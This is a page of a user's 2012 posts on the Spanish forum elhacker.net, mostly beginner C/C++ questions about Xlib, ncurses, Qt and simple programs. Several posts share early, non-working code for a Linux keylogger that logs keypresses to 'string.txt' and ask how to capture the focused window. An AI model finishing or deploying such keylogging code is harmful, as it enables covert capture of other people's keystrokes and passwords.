elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7] 8
61  Programación / Programación C/C++ / Porque no me funciona este codigo en: 10 Junio 2012, 13:38 pm
Bueno sigo haciendo mi keylogger y me he metido con las Xlib, he hecho este codigo para que recoja los eventos del teclado y los guarde en un archivo, pero no me funciona,me abre el fichero pero esta vacio, si alguien me puede decir porque... Dejo el codigo:
Código:
#include <X11/Xlib.h>
#include <X11/Xutil.h>
#include <stdio.h>



int main(){
bool bucle=true;
FILE* fichero=fopen("string.txt", "a");
XEvent evento;
Display* display=XOpenDisplay(NULL);
Window ventana;
int pantalla;
unsigned long negro, blanco;
pantalla=DefaultScreen(display);
negro=BlackPixel(display, pantalla);
blanco=WhitePixel(display, pantalla);
ventana=XCreateSimpleWindow(display, DefaultRootWindow(display), 200, 200, 200, 200, 200, negro, blanco);
XMapWindow(display, ventana);
XSelectInput(display, ventana, KeyPressMask);
XFlush(display);
while (bucle==true){
 XNextEvent(display, &evento);
 XFlush(display);
 switch (evento.type){
  case KeyPress:
   {fputc(getc(stdin), fichero); fflush(fichero);}
   continue;
  default:
  continue;
}
}
return 0;
}

Saludos y gracias de antemano.
62  Programación / Programación C/C++ / Compilar Xlib. en: 8 Junio 2012, 16:10 pm
Hola veran, estoy usando las Xlib en Code::Blocks, en Ubuntu y he mirado documentacion, pero al usar las funciones que aparecen en dicha documentacion, me saltan errores que dicen: 'undefined reference to Xejemplo()'. ?Hay que descargarse estas librerias o algo¿ :huh: :huh:

Saludos.
63  Programación / Programación C/C++ / Necesito ayuda con funcion en C++. en: 6 Junio 2012, 17:11 pm
Hola, veran, necesito que alguien me diga como es la sintaxis de la funcion XGetSelectionOwner(Display* display, Atom selection), que parametros se le pueden pasar, en que biblioteca esta definida(porque incluyendo X11/Xlib me dice undefined reference) y esas cosas.

Saludos y gracias de antemano ;D
64  Programación / Programación C/C++ / GetForeGroundWindow linux. en: 3 Junio 2012, 14:44 pm
Hola estoy haciendo un keylogger, que espero que sea multiplataforma, y ya tengo hecho el que coja las teclas y las mande a un archivo de texto, pero no se como coger el foco de la ventana activa. Se cual es la tipica funcion GetForeGroundWindow, pero estoy en ubuntu. ¿Alguien sabe cual es el equivalente de esto en linux?

Dejo lo que llevo por si a alguien le interesa:
Código:
#include <stdio.h>
#include <ncurses.h>

FILE* fichero;

int kbhit(void)
{
    int ch = getch();

    if (ch != ERR) {
        ungetch(ch);
        return 1;
    } else {
        return 0;
    }
}

int main() {
 initscr();
 noecho();
 nodelay(stdscr, true);
 fichero = fopen("string.txt","a");
 while (1){
 if (kbhit()){fputc(getch(),fichero); fflush(fichero);  }
 refresh();
}
return 0; }


Y para compilar: g++ 'ruta/del/codigo/fuente' -o klg   -lncurses

Saludos y gracias de antemano ;D
65  Programación / Programación C/C++ / No puedo compilar esto. en: 2 Junio 2012, 14:58 pm
Hola, veran estoy haciendo el principio de un keylogger, y utilizo las librerias ncurses y fstream, pero al compilar si lo intento con Code::Blocks me saltan errores de 'undefined reference to wgetch' y asi con todas las funciones de la libreria ncurses, y si lo hago por terminal usando -lncurses me sale lo mismo pero con las funciones de fstream. ¿Que puedo hacer? :huh: :huh:

Les dejo el code:
Código:
#include <ncurses.h>
#include <fstream>
using namespace std;

char cadena1[250], cadena2[250], cadena3[250];

int kbhit(void)
{
    int ch = getch();

    if (ch != ERR) {
        ungetch(ch);
        return 1;
    } else {
        return 0;
    }
}

int main() {
 initscr();
 noecho();
 nodelay(stdscr, true);
 ofstream fs ("string.txt");
 while (1){
 if (kbhit()){fs << getch();   }
 refresh();
}
return 0; }


Saludos y gracias de antemano.
66  Programación / Programación C/C++ / Error funcion aleatoria. en: 30 Mayo 2012, 19:42 pm
Bueno estoy haciendo un programa muy basico que te da una palabra en ingles seleccionada aleatoriamente y te la pide en español. El problema es que cuando lo ejecuto siempre sale la palabra "Asustado", aunque vuelva a compilar, y que, aunque ponga "h" en vez de "scared" me sale que es correcto. Dejo el code y espero que me puedan ayudar:

Código:
#include <cstdlib>
#include <iostream>

using namespace std;

char palabra[35];
int c;

int main(){
  c=(1 + rand() % 2);
  switch (c)
  {
   case 1: {cout <<"Ligth\n"<<"Introduce la palabra y pulsa enter:";  cin >> (palabra); if (palabra=="ligero" || "Ligero" || "Luz"){cout << "Rigth!";} else {cout << "Wrong!";}} break;
   case 2: {cout <<"Asustado\n"<<"Introduce la palabra y pulsa enter:"; cin >> palabra; if (palabra=="scared" || "Scared") {cout << "Rigth!";} else {cout << "Wrong!";} } break;
   default: {cout <<"Se produjo un error";}
  }return 0;
}

Saludos y gracias de antemano;D
67  Programación / Programación C/C++ / Una duda con QT. en: 29 Mayo 2012, 19:52 pm
Bueno este code me da varios errores al compilarlo y no termino de entender por qué :huh: :huh:
Estaria bien si alguien me pudiera aclarar lo que dice el compilador(lo dejo abajo)

clase.h
Código:
#ifndef CLASE_H
#define CLASE_H
#include <QApplication>
#include <QPushButton>
class MyDialog : public QDialog
{
Q_OBJECT
public :
MyDialog (QWidget ∗ parent = 0, const char* name=0);
~MyDialog ( ) ;

private :
QPushButton ∗ button ;
};

#endif//CLASE_H

main.cpp
Código:
#include "clase.h"
#include <QApplication>
#include <QPushButton>


int main(int argc, char *argv[])
{
  QApplication Main(argc, argv);
  MyDialog ventana;
  ventana.setCaption("hola");
  ventana.show();
  Main.setMainWidget(&ventana);
  ventana.exec();
  return Main.exec();
}

Lo que dice el compi
Código:
g++ -c -pipe -O2 -Wall -W -D_REENTRANT -DQT_WEBKIT -DQT_NO_DEBUG -DQT_GUI_LIB -DQT_CORE_LIB -DQT_SHARED -I/usr/share/qt4/mkspecs/linux-g++ -I. -I/usr/include/qt4/QtCore -I/usr/include/qt4/QtGui -I/usr/include/qt4 -I. -I. -o main.o main.cpp
In file included from main.cpp:1:0:
clase.h:9:1: error: ‘\342’ parásito en el programa
clase.h:9:1: error: ‘\210’ parásito en el programa
clase.h:9:1: error: ‘\227’ parásito en el programa
clase.h:13:1: error: ‘\342’ parásito en el programa
clase.h:13:1: error: ‘\210’ parásito en el programa
clase.h:13:1: error: ‘\227’ parásito en el programa
clase.h:6:1: error: uso inválido del tipo incompleto ‘struct QDialog’
/usr/include/qt4/QtGui/qwindowdefs.h:57:7: error: declaración adelantada de ‘struct QDialog’
clase.h:9:38: error: expected unqualified-id before ‘/’ token
clase.h:11:1: error: expected unqualified-id before ‘/’ token
main.cpp: En la función ‘int main(int, char**)’:
main.cpp:9:12: error: la conversión a ‘QWidget’ desde la lista del inicializador usaría el constructor explícito ‘QWidget::QWidget(QWidget*, Qt::WindowFlags)’
main.cpp:10:11: error: ‘class MyDialog’ no tiene un miembro llamado ‘setCaption’
main.cpp:11:11: error: ‘class MyDialog’ no tiene un miembro llamado ‘show’
main.cpp:12:8: error: ‘class QApplication’ no tiene un miembro llamado ‘setMainWidget’
main.cpp:13:11: error: ‘class MyDialog’ no tiene un miembro llamado ‘exec’
make: *** [main.o] Error 1
yo@yo-DOT-SE:~/Documentos/YO/programacion/cap1/dg$ qmake -project
yo@yo-DOT-SE:~/Documentos/YO/programacion/cap1/dg$ qmake
yo@yo-DOT-SE:~/Documentos/YO/programacion/cap1/dg$ make
g++ -c -pipe -O2 -Wall -W -D_REENTRANT -DQT_WEBKIT -DQT_NO_DEBUG -DQT_GUI_LIB -DQT_CORE_LIB -DQT_SHARED -I/usr/share/qt4/mkspecs/linux-g++ -I. -I/usr/include/qt4/QtCore -I/usr/include/qt4/QtGui -I/usr/include/qt4 -I. -I. -o main.o main.cpp
In file included from main.cpp:1:0:
clase.h:9:1: error: ‘\342’ parásito en el programa
clase.h:9:1: error: ‘\210’ parásito en el programa
clase.h:9:1: error: ‘\227’ parásito en el programa
clase.h:13:1: error: ‘\342’ parásito en el programa
clase.h:13:1: error: ‘\210’ parásito en el programa
clase.h:13:1: error: ‘\227’ parásito en el programa
clase.h:6:1: error: uso inválido del tipo incompleto ‘struct QDialog’
/usr/include/qt4/QtGui/qwindowdefs.h:57:7: error: declaración adelantada de ‘struct QDialog’
main.cpp: En la función ‘int main(int, char**)’:
main.cpp:9:12: error: la conversión a ‘QWidget’ desde la lista del inicializador usaría el constructor explícito ‘QWidget::QWidget(QWidget*, Qt::WindowFlags)’
main.cpp:10:11: error: ‘class MyDialog’ no tiene un miembro llamado ‘setCaption’
main.cpp:11:11: error: ‘class MyDialog’ no tiene un miembro llamado ‘show’
main.cpp:12:8: error: ‘class QApplication’ no tiene un miembro llamado ‘setMainWidget’
main.cpp:13:11: error: ‘class MyDialog’ no tiene un miembro llamado ‘exec’

Saludos ;D
68  Programación / Programación C/C++ / Manuales API linux en: 26 Mayo 2012, 15:13 pm
Bueno pues he estado buscando si existe algo asi como la API de windows en linux, pero no he encontrado nada. ¿Me podrian decir si existe algo asi, y si existe, pasarme algun manual?

Saludos ;D
69  Programación / Programación C/C++ / [AYUDA]Posicionar el cursor en C++ en: 23 Mayo 2012, 21:10 pm
Bueno he estado buscando en google sobre este tema y no he encontrado nada, salvo algunas referencias a la API de windows, pero trabajo en ubuntu. La pregunta es: ¿alguien sabe de alguna biblioteca que contenga alguna funcion para posicionar el cursor en C++?

Saludos ;D
70  Programación / Programación C/C++ / [AYUDA]i want a cookie 4 en: 20 Mayo 2012, 20:28 pm
Bueno aqui estoy ya otra vez molestando >:D con el 4º tema sobre el mismo code, realmente me voy a alegrar cuando lo termine.El problema esta en al pulsar una tecla repetidamente deberia terminar el programa debido a la funcion kbhit(), pero no lo hace. :(

Code:
Código:
#include <ncurses.h>
#include <unistd.h>

int numbercookies=1;
char cookie[8];
bool bucle=true;

int kbhit(void)
{
    int ch = getch();

    if (ch != ERR) {
        ungetch(ch);
        return 1;
    } else {
        return 0;
    }
}

void funcion(void)
{
 while (bucle==true && 1)
 {
   initscr();
   cbreak();
   nodelay(stdscr,TRUE);
   printw("I WANT A COOKIE\t");
   numbercookies++;
   refresh();
  
   if (kbhit()){
   numbercookies--;

}
   else{
   sleep(1);
}
   sleep(1);
   if (numbercookies==0) {bucle=false; }


}
endwin();
}

int main()
{
 funcion();
 return 0;
}

               

Espero que puedan ayudarme :D

Saludos ;D
Páginas: 1 2 3 4 5 6 [7] 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines